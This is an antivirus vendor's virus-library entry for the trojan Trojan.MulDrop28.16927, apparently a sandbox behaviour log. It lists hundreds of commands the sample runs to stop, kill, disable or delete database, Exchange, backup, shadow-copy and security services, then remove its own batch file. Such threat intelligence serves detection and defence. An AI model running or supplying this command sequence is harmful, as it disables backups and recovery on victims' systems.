PER UTENTI

Chiudi

La mia libreria
La mia libreria

+ Aggiungi alla libreria

Ricerca
Ricerca

Supporto
Supporto 24/7 | Regole per contattare

Scrivi

Una richiesta attraverso il modulo

Chiama

+7 (495) 789-45-86

Forum

Richieste

Crea nuova richiesta

Chiama

+7 (495) 789-45-86

Profile

IT

RU CN DE EN ES FR IT JP KZ UZ PL BY
Chiudi
Servizi
Scanner
Dr.Web vxCube
Versione di prova
Perizia di incidenti informatici legati ai virus
Libreria dei virus
Base di conoscenza

Tecnologie

Termini

Formazione ed informazione

Falsi miti

Notizie

Trojan.MulDrop28.16927

Aggiunto al database dei virus Dr.Web: 2024-09-06

La descrizione è stata aggiunta:

Technical Information

Malicious functions
Executes the following
  • '<SYSTEM32>\net.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\taskkill.exe' /IM httpd.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeIS
  • '<SYSTEM32>\taskkill.exe' /IM Launchpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM licenceserver.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM iexplore.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Manager.exe
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\taskkill.exe' /IM ServerNT.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\net.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\taskkill.exe' /IM SqlManagement.exe /F
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\net.exe' stop "AliyunService"
  • '<SYSTEM32>\net.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\net.exe' stop MSExchangePop3
  • '<SYSTEM32>\net.exe' stop CASXMLService
  • '<SYSTEM32>\taskkill.exe' /IM rcrelay.exe /F
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\net.exe' stop AutoUpdateService
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\net.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\net.exe' stop Tomcat8
  • '<SYSTEM32>\net.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\net.exe' stop MSExchangeHM
  • '<SYSTEM32>\net.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\taskkill.exe' /IM U8CEServer.exe /F
  • '<SYSTEM32>\net.exe' stop TeamViewer
  • '<SYSTEM32>\net.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\net.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\taskkill.exe' /IM tomcat9.exe /F
  • '<SYSTEM32>\net.exe' stop QPCore
  • '<SYSTEM32>\net.exe' stop AdobeARMservice
  • '<SYSTEM32>\net.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net.exe' stop CASLicenceServer
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net.exe' stop CASWebServer
  • '<SYSTEM32>\net.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\taskkill.exe' /IM Att.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\net.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\net.exe' stop MySQL5_OA
  • '<SYSTEM32>\net.exe' stop ClickToRunSvc
  • '<SYSTEM32>\net.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net.exe' stop RavTask
  • '<SYSTEM32>\net.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\net.exe' stop AngelOfDeath
  • '<SYSTEM32>\net.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net.exe' stop d_safe
  • '<SYSTEM32>\net.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net.exe' stop NFLicenceServer
  • '<SYSTEM32>\net.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net.exe' stop RavService
  • '<SYSTEM32>\net.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net.exe' stop DFServ
  • '<SYSTEM32>\taskkill.exe' /IM mpdwsvc.exe /F
  • '<SYSTEM32>\net.exe' stop OMAILREPORT
  • '<SYSTEM32>\net.exe' stop IngressMgr
  • '<SYSTEM32>\net.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net.exe' stop EvtSys
  • '<SYSTEM32>\net.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net.exe' stop Service2
  • '<SYSTEM32>\net.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net.exe' stop ServiceMid
  • '<SYSTEM32>\net.exe' stop RapService
  • '<SYSTEM32>\net.exe' stop MSExchangeRepl
  • '<SYSTEM32>\net.exe' stop DDNSService
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\net.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net.exe' stop CASMsgSrv
  • '<SYSTEM32>\net.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeTransport
  • '<SYSTEM32>\net.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\net.exe' stop tmlisten
  • '<SYSTEM32>\net.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net.exe' stop MSExchangeUM
  • '<SYSTEM32>\net.exe' stop MySQL
  • '<SYSTEM32>\net.exe' stop AGSService
  • '<SYSTEM32>\net.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CloudService.exe
  • '<SYSTEM32>\net.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClient.exe /F
  • '<SYSTEM32>\net.exe' stop vss
  • '<SYSTEM32>\net.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\net.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\net.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net.exe' stop SQLWriter
  • '<SYSTEM32>\net.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\net.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\net.exe' stop vmvss
  • '<SYSTEM32>\net.exe' stop "ReportServer"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net.exe' stop U8WorkerService1
  • '<SYSTEM32>\net.exe' stop U8WorkerService2
  • '<SYSTEM32>\net.exe' stop HaoZipSvc
  • '<SYSTEM32>\taskkill.exe' /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
  • '<SYSTEM32>\net.exe' stop "memcached Server"
  • '<SYSTEM32>\net.exe' stop "TMBMServer"
  • '<SYSTEM32>\net.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net.exe' stop Apache2.4
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.CatalogDataService.exe
  • '<SYSTEM32>\net.exe' stop "SQLAgent"
  • '<SYSTEM32>\net.exe' stop Realtek11nSU
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\net.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\net.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net.exe' stop MSSQL$
  • '<SYSTEM32>\net.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.Agent.ConfigurationService.exe
  • '<SYSTEM32>\taskkill.exe' /IM DDSoftPwsTomcat9.exe /F
  • '<SYSTEM32>\net.exe' stop "SQLWrite"
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\taskkill.exe' /IM Tomcat7w.exe /F
  • '<SYSTEM32>\net.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\net.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\taskkill.exe' /F /IM Veeam.Backup.BrokerService.exe
  • '<SYSTEM32>\net.exe' stop SQLBrowser
  • '<SYSTEM32>\net.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\net.exe' stop "MSSQL"
  • '<SYSTEM32>\net.exe' stop WebAttendServer
  • '<SYSTEM32>\taskkill.exe' /IM UFSoft.U8.OC.QuartzScheduler.exe /F
  • '<SYSTEM32>\net.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net.exe' stop mysqltransport
  • '<SYSTEM32>\net.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\taskkill.exe' /IM NFVPrint.exe /F
  • '<SYSTEM32>\net.exe' stop JWRinfoClientService
  • '<SYSTEM32>\taskkill.exe' /IM pg_ctl.exe /F
  • '<SYSTEM32>\net.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\net.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net.exe' stop VMnetDHCP
  • '<SYSTEM32>\taskkill.exe' /IM ThunderPlatform.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM BackupExec.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM VBoxSDS.exe /F
  • '<SYSTEM32>\net.exe' stop JWService
  • '<SYSTEM32>\net.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\net.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\net.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\net.exe' stop xenlite
  • '<SYSTEM32>\taskkill.exe' /IM ReportingServicesService.exe /F
  • '<SYSTEM32>\net.exe' stop XenSvc
  • '<SYSTEM32>\net.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net.exe' stop Apache2.2
  • '<SYSTEM32>\net.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\net.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net.exe' stop UIODetect
  • '<SYSTEM32>\net.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\net.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\net.exe' stop VMwareHostd
  • '<SYSTEM32>\net.exe' stop TeamViewer8
  • '<SYSTEM32>\net.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\net.exe' stop DellDRLogSvc
  • '<SYSTEM32>\taskkill.exe' /IM U8SmartClientMonitor.exe /F
  • '<SYSTEM32>\net.exe' stop VMUSBArbService
  • '<SYSTEM32>\net.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\net.exe' stop VMAuthdService
  • '<SYSTEM32>\net.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\net.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net.exe' stop UFIDAWebService
  • '<SYSTEM32>\net.exe' stop K3ClouManager
Launches a large number of processes
Modifies file system
Creates the following files
  • %TEMP%\4eda.tmp\4edb.tmp\4edc.bat
Deletes the following files
  • %TEMP%\4eda.tmp\4edb.tmp\4edc.bat
Deletes itself.
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4EDA.tmp\4EDB.tmp\4EDC.bat <Full path to file>"
  • '<SYSTEM32>\sc.exe' delete SQLService
  • '<SYSTEM32>\sc.exe' delete GPSDownSvr
  • '<SYSTEM32>\sc.exe' delete CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete GPSUserSvr
  • '<SYSTEM32>\sc.exe' delete SQLANYs_sem5
  • '<SYSTEM32>\sc.exe' delete GPSDaemon
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxAssistants
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Detect Service"
  • '<SYSTEM32>\sc.exe' delete OracleRemExecService
  • '<SYSTEM32>\net1.exe' stop MSExchangeMailboxReplication
  • '<SYSTEM32>\sc.exe' delete CobianBackup10
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS
  • '<SYSTEM32>\net1.exe' stop AutoUpdateService
  • '<SYSTEM32>\sc.exe' delete vmware-converter-worker
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc
  • '<SYSTEM32>\sc.exe' delete RaAutoInstSrv_RT2870
  • '<SYSTEM32>\sc.exe' delete vmware-converter-server
  • '<SYSTEM32>\sc.exe' delete MediatekRegistryWriter
  • '<SYSTEM32>\sc.exe' delete OracleMTSRecoveryService
  • '<SYSTEM32>\net1.exe' stop MSExchangeIMAP4BE
  • '<SYSTEM32>\sc.exe' delete LPManager
  • '<SYSTEM32>\sc.exe' delete QQCertificateService
  • '<SYSTEM32>\net1.exe' stop CASXMLService
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\sc.exe' delete GPSStorageSvr
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\sc.exe' delete Mysoft.Config.WindowsService
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\sc.exe' delete GPSMysqld
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.UpdateService
  • '<SYSTEM32>\net1.exe' stop AGSService
  • '<SYSTEM32>\sc.exe' delete GPSTomcat6
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc
  • '<SYSTEM32>\sc.exe' delete GPSLoginSvr
  • '<SYSTEM32>\net1.exe' stop MSExchangePop3
  • '<SYSTEM32>\net1.exe' stop VeeanBackupSvc
  • '<SYSTEM32>\sc.exe' delete Mysoft.Autoupgrade.DispatchService
  • '<SYSTEM32>\sc.exe' delete GPSMediaSvr
  • '<SYSTEM32>\net1.exe' stop TPlusStdWebService1300
  • '<SYSTEM32>\sc.exe' delete ErpEnvSvc
  • '<SYSTEM32>\sc.exe' delete GPSGatewaySvr
  • '<SYSTEM32>\sc.exe' delete GPSDataProcSvr
  • '<SYSTEM32>\net1.exe' stop "AliyunService"
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1300
  • '<SYSTEM32>\net1.exe' stop MSExchangeNotificationsBroker
  • '<SYSTEM32>\sc.exe' delete TbossSystem
  • '<SYSTEM32>\sc.exe' delete semwebsrv
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1300
  • '<SYSTEM32>\net1.exe' stop "Alibaba Security Aegis Update Service"
  • '<SYSTEM32>\net1.exe' stop CASWebServer
  • '<SYSTEM32>\sc.exe' delete MSSEARCH
  • '<SYSTEM32>\net1.exe' stop RapidRecoveryAgent
  • '<SYSTEM32>\sc.exe' delete KuaiYunTools
  • '<SYSTEM32>\net1.exe' stop Tomcat8
  • '<SYSTEM32>\sc.exe' delete MotionBoard57
  • '<SYSTEM32>\sc.exe' delete "SQL Server Reporting Services"
  • '<SYSTEM32>\sc.exe' delete wampapache
  • '<SYSTEM32>\net1.exe' stop "ReportServer$OPTIMA"
  • '<SYSTEM32>\net1.exe' stop MSExchangeFrontEndTransport
  • '<SYSTEM32>\sc.exe' delete MsDtsServer100
  • '<SYSTEM32>\net1.exe' stop Service2
  • '<SYSTEM32>\net1.exe' stop "msftesql$SQLEXPRESS"
  • '<SYSTEM32>\net1.exe' stop "VMware NAT Service"
  • '<SYSTEM32>\sc.exe' delete NFWebServer
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete IpOverUsbSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeFastSearch
  • '<SYSTEM32>\net1.exe' stop JWService
  • '<SYSTEM32>\sc.exe' delete "OSP Service"
  • '<SYSTEM32>\sc.exe' delete AppFabricCachingService
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\sc.exe' delete 360EntClientSvc
  • '<SYSTEM32>\sc.exe' delete OracleJobSchedulerORCL
  • '<SYSTEM32>\sc.exe' delete ADWS
  • '<SYSTEM32>\sc.exe' delete Protect_2345Explorer
  • '<SYSTEM32>\sc.exe' delete BestSyncSvc
  • '<SYSTEM32>\sc.exe' delete MotionBoardRCService57
  • '<SYSTEM32>\net1.exe' stop MSExchangeImap4
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc
  • '<SYSTEM32>\sc.exe' config "SQLSERVERAGENT" start= disabled
  • '<SYSTEM32>\sc.exe' delete 2345PicSvc
  • '<SYSTEM32>\net1.exe' stop CASLicenceServer
  • '<SYSTEM32>\sc.exe' delete OracleDBConcoleorcl
  • '<SYSTEM32>\sc.exe' delete "FlexNet Licensing Service 64"
  • '<SYSTEM32>\net1.exe' stop MSExchangeHMRecovery
  • '<SYSTEM32>\net1.exe' stop AdobeARMservice
  • '<SYSTEM32>\sc.exe' config "MSSQLFDLauncher" start= disabled
  • '<SYSTEM32>\sc.exe' delete vmware-converter-agent
  • '<SYSTEM32>\sc.exe' delete "SyncBASE Service"
  • '<SYSTEM32>\net1.exe' stop QPCore
  • '<SYSTEM32>\sc.exe' delete VisualSVNServer
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL2008
  • '<SYSTEM32>\sc.exe' delete msftesql
  • '<SYSTEM32>\net1.exe' stop "postgresql-x64-9.4"
  • '<SYSTEM32>\net1.exe' stop FirebirdServerDefaultInstance
  • '<SYSTEM32>\sc.exe' delete btPanel
  • '<SYSTEM32>\net1.exe' stop TeamViewer
  • '<SYSTEM32>\sc.exe' delete vsvnjobsvc
  • '<SYSTEM32>\sc.exe' delete KMSELDI
  • '<SYSTEM32>\net1.exe' stop MSExchangeHM
  • '<SYSTEM32>\net1.exe' stop RapService
  • '<SYSTEM32>\sc.exe' delete Mysoft.DataCenterService
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\sc.exe' delete U8GCService
  • '<SYSTEM32>\sc.exe' delete NscAuthService
  • '<SYSTEM32>\sc.exe' delete MASTER
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\sc.exe' delete U8EncryptService
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\sc.exe' delete U8EISService
  • '<SYSTEM32>\sc.exe' delete FTA
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' delete U8DispatchService
  • '<SYSTEM32>\sc.exe' delete RTCASMCU
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\sc.exe' delete RtcSrv
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' delete OfficeUpdateService
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\sc.exe' delete asComSvc
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop EvtSys
  • '<SYSTEM32>\net1.exe' stop "Dell Hardware Support"
  • '<SYSTEM32>\net1.exe' stop IngressMgr
  • '<SYSTEM32>\net1.exe' stop OMAILREPORT
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\net1.exe' stop DFServ
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\sc.exe' delete UFAllNet
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\sc.exe' delete U8KeyManagePool
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete U8TaskService
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\sc.exe' delete U8SLReportService
  • '<SYSTEM32>\sc.exe' delete U8SCMPool
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\sc.exe' delete "U8MPool"
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\net1.exe' stop RavService
  • '<SYSTEM32>\sc.exe' delete "Daemon Service"
  • '<SYSTEM32>\sc.exe' delete "Nuo Update Monitor"
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\net1.exe' stop CASVirtualDiskService
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop iNethinkSQLBackupSvc
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\net1.exe' stop DDNSService
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\sc.exe' delete RemoteAssistService
  • '<SYSTEM32>\net1.exe' stop CASMsgSrv
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop "MSSQLSERVER"
  • '<SYSTEM32>\net1.exe' stop SupportAssistAgent
  • '<SYSTEM32>\net1.exe' stop "MSSQL$OPTIMA"
  • '<SYSTEM32>\net1.exe' stop JWRinfoClientService
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\net1.exe' stop vss
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\net1.exe' stop "SQLAgent"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Network Service"
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' config vss start=disabled
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\sc.exe' config SQLBrowser start=disabled
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Servi...
  • '<SYSTEM32>\net1.exe' stop "MSSQL"
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\net1.exe' stop "NetBackup Legacy Client Service"
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete "AHS SERVICE"
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer100"
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' config SQLWriter start=disabled
  • '<SYSTEM32>\net1.exe' stop "NetBackup SAN Client Fibre Transport Service"
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM Veeam.Backup...
  • '<SYSTEM32>\sc.exe' delete REPLICA
